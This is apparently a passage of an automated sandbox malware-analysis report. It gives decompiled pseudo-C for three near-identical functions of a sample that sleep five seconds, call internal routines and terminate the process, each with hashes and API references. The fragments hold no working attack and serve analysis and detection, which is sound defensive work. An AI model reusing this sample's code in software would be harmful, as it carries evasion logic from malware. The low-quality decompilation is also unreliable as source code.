                      • Snapshot File: hcaresult_7_2_400000_twtgjvf.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                      • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("out 0x95, eax");
                      				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}







                      0x00401822
                      0x00401822
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000007.00000002.503845597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_400000_twtgjvf.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                      • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("sbb ebx, ebp");
                      				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401826
                      0x00401826
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000007.00000002.503845597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_400000_twtgjvf.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                      • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 20%
                      			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t10;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t22;
                      				void* _t25;
                      
                      				_t26 = __eflags;
                      				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t19 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				if(_t13 != 0) {
                      					_push( *((intOrPtr*)(_t25 + 0x14)));
                      					_push( *((intOrPtr*)(_t25 - 4)));
                      					_push(_t13);
                      					_push(_t19); // executed
                      					L00401455(0x60, _t22, __edi); // executed
                      				}
                      				 *_t19(0xffffffff, 0); // executed
                      				_t19 = _t19 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401834
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000007.00000002.503845597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_400000_twtgjvf.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                      • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                      Uniqueness

                      Uniqueness Score: -1.00%